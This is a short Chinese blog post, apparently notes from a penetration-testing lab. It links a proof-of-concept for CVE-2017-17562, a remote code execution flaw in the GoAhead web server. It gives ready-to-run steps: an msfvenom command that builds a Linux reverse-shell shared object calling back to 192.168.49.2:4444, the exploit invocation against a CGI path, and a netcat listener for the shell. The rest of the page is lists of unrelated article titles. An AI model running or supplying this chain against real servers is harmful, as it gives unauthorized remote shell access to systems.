poc地址

https://github.com/ivanitlearning/CVE-2017-17562

执行

msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.49.2 LPORT=4444 -f elf-so -o payload.so

python exploit.py -rhost 192.168.49.2 -rport 8080 -cgipath /cgi-bin/index -payload payload.so

nc -lvvp 4444



最新文章

  1. 深入浅出node(1) Node简介
  2. C++ STL泛型编程——在ACM中的运用
  3. c3p0配置详解
  4. 【leetcode】Excel Sheet Column Number
  5. Linux查看用户登陆历史记录
  6. web项目Log4j日志输出路径配置问题
  7. NGUI系列教程八(监听NGUI的事件方法)
  8. linux0.12 解决编译问题常用命令
  9. VSCode从非根目录编译golang程序
  10. [LOJ 6185]烷基计数
  11. application.properties 文件和 application.yml 文件的区别
  12. mssql 存储过程调用另一个存储过程中的结果的方法分享
  13. python递归
  14. FTP之二
  15. poi 升级至4.x 的问题总结(POI Excel 单元格内容类型判断并取值)
  16. Linux下修改环境变量,不小心改错,找不到命令解决办法
  17. 实验三 Java敏捷开发与xp实现
  18. soj1763.传球游戏
  19. 消息中间件--"rocketmq"02之QuickStart
  20. 怎么在一台电脑上安装win7与centos7双系统

热门文章

  1. 查询表空间总大小(dba_data_files和dba_segments,dba_free_space区别)
  2. STL----vector注意事项
  3. Java新一代单元测试框架JUnit5速览
  4. 微信sdk上传图片大小1k,损坏的问题以及微信上传图片需要的配置
  5. R语言六种数据类型
  6. vim安装及个性化配置
  7. Excel对单元格设置上涨、下降箭头
  8. Excel选择区域一次性替换小于200的数值
  9. Reactive Spring实战 -- 响应式MySql交互
  10. mac 下彻底卸载node和npm